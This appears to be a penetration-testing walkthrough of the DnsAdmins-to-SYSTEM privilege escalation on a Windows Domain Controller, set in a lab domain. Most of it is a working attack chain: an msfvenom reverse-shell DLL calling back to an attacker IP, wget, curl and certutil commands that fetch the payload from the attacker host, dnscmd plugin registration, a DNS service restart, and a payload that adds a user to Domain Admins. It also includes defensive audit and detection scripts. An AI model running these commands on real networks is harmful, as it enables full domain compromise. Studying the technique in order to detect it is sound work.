
Description

Members of the DnsAdmins group can abuse a feature of the Microsoft DNS management protocol to make the DNS server load an arbitrary DLL. The DNS service that loads and executes that DLL runs in the context of SYSTEM, and because DNS usually runs on a Domain Controller, this can be used to gain Domain Administrator privileges.

When can it be abused?

Once inside an AD environment, you can check whether a user is a member of the DnsAdmins group (or of a group nested inside it, since DnsAdmins is a domain local group and shows up as an Alias) with the commands:

net user <username> /domain
Get-ADGroupMember -Identity "DnsAdmins"
# only if you have access as the user you are enumerating
whoami /groups

If the output is as follows:

*Evil-WinRM* PS C:\Users\ryan\Desktop> Get-ADGroupMember -Identity "DnsAdmins"


distinguishedName : CN=Contractors,OU=Groups,DC=megabank,DC=local
name              : Contractors
objectClass       : group
objectGUID        : 9f2ff7be-f805-491f-aff1-3653653874d7
SamAccountName    : Contractors
SID               : S-1-5-21-1392959593-3013219662-3596683436-1103

or

*Evil-WinRM* PS C:\Users\ryan\Desktop> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

Then you can abuse this privilege!
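The output above shows why this is easy to miss in an audit: the only direct member of DnsAdmins is the Contractors group, and ryan reaches DnsAdmins through it. The following is an added audit script (not part of the original note) that expands nested groups so every account that effectively holds this privilege is listed; it assumes the ActiveDirectory RSAT module is installed and the names come from the page's output.

```powershell
# Added audit example: list direct members of DnsAdmins, then every user account
# that is an effective member once nested groups (e.g. Contractors) are expanded.
# Assumes the ActiveDirectory module (RSAT) is available on the machine running this.
Import-Module ActiveDirectory

$group = 'DnsAdmins'

Write-Host "Direct members of ${group}:"
Get-ADGroupMember -Identity $group |
    Select-Object name, objectClass, SamAccountName |
    Format-Table -AutoSize

Write-Host "Effective user members of ${group} (nested groups expanded):"
Get-ADGroupMember -Identity $group -Recursive |
    Where-Object { $_.objectClass -eq 'user' } |
    ForEach-Object {
        # Pull account state so stale or disabled accounts are visible in the review.
        $u = Get-ADUser -Identity $_.distinguishedName -Properties LastLogonDate
        [PSCustomObject]@{
            SamAccountName = $u.SamAccountName
            Enabled        = $u.Enabled
            LastLogonDate  = $u.LastLogonDate
            DistinguishedName = $u.DistinguishedName
        }
    } |
    Format-Table -AutoSize
```

Every account in the second table can make the DNS service on the DC load a DLL as SYSTEM, so the list should be as short as possible and reviewed like Domain Admins membership.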

How can it be abused?

Creating the DLL with MSFVenom

Use Metasploit's msfvenom to create a malicious DLL that returns a reverse shell:

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.12 LPORT=1337 -f dll > pew.dll

Delivering the DLL

There are multiple ways to do this stage: you can host the DLL on your own SMB server or on a Python HTTP server, or, if you already have a shell through evil-winrm, you can simply upload the file.

SMB Server

Using the impacket scripts (impacket-smbserver), you can start a server with a named share and test that it is reachable. Then, from the target host, you can use net view to connect and grab the DLL.

~ $ sudo impacket-smbserver testshare /home/kali/Desktop/test

You can then test whether the share is up with the command:

~ $ smbclient -L //10.10.14.12/ -N

Replace 10.10.14.12 with your SMB server's IP. To test whether the target is able to reach your share, run:

PS C:\> net view \\10.10.14.12

Python HTTP Server

With Python's http.server module you can host the DLL file and download it on the target machine using common utilities.

HOSTING

~ $ sudo python3 -m http.server 80

DOWNLOADING

# in PowerShell, wget and curl are aliases of Invoke-WebRequest, so -OutFile is needed to write the file to disk
wget http://10.10.14.12/pew.dll -OutFile pew.dll
curl http://10.10.14.12/pew.dll -OutFile pew.dll
certutil.exe -urlcache -f http://10.10.14.12/pew.dll pew.dll

Evil-WinRM

Just run the command upload /path/to/pew.dll from the evil-winrm prompt:

*Evil-WinRM* PS C:\Users\ryan\Desktop> upload /home/kali/Desktop/test/pew.dll
Info: Uploading pew.dll to C:\Users\ryan\Desktop\pew.dll

Data: 12288 bytes of 12288 bytes copied

Info: Upload successful!

Execution

We now register the DLL as the DNS server's plugin with dnscmd, which writes its path into the ServerLevelPluginDll setting of the DNS service:

dnscmd <FQDN of DC> /config /serverlevelplugindll /path/to/pew.dll
*Evil-WinRM* PS C:\Users\ryan\Desktop> dnscmd test.vulnerable.local /config /serverlevelplugindll C:\Users\ryan\Desktop\pew.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

Now that the DLL path is registered, the next step is to restart the DNS service so that it loads the DLL and returns the reverse shell.

sc.exe stop dns
sc.exe start dns

This should trigger a reverse shell running as SYSTEM on the Domain Controller!
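From the defender's side, the artifact this whole chain leaves behind is the ServerLevelPluginDll value that dnscmd writes for the DNS service. The following is an added check (not part of the original note) that reads that value on each DNS server and flags any populated entry; $DnsServers is an assumed list of hostnames, and it must be run with administrative rights on those servers.

```powershell
# Added defender check: report any DNS server whose ServerLevelPluginDll is set.
# dnscmd /config /serverlevelplugindll stores its argument in this registry value,
# so a non-empty value on a server where no plugin is expected is a strong signal.
$DnsServers = @('dc01.megabank.local')   # assumption: replace with your DNS server names
$KeyPath    = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

foreach ($server in $DnsServers) {
    $plugin = Invoke-Command -ComputerName $server -ArgumentList $KeyPath -ScriptBlock {
        param($path)
        # Returns $null when the value is absent, which is the expected healthy state.
        (Get-ItemProperty -Path $path -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
    }

    if ([string]::IsNullOrEmpty($plugin)) {
        Write-Host "[OK]      $server : no ServerLevelPluginDll configured"
    }
    else {
        Write-Warning "$server : ServerLevelPluginDll = '$plugin' (verify the DLL, its signer and who set it)"
        # Remediation once the DLL is confirmed to be illegitimate: remove the value on that
        # server and restart the DNS service so the path is no longer loaded, e.g.
        #   Invoke-Command -ComputerName $server -ScriptBlock {
        #       Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters' -Name ServerLevelPluginDll
        #       Restart-Service -Name DNS
        #   }
    }
}
```

A stop/start of the DNS service on a DC shortly after this value changes is the other event worth alerting on, since the technique needs the restart to take effect.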

ALTERNATIVE EXECUTION

Alternatively, if a reverse shell is more than you need, you can create a DLL that simply adds the user you already control to the Domain Admins group. Below is the command to create that DLL:

msfvenom -p windows/x64/exec cmd='net group "Domain Admins" <user> /add /domain' --platform windows -f dll > pew.dll

I then upload it to the target's host and attempt to execute it!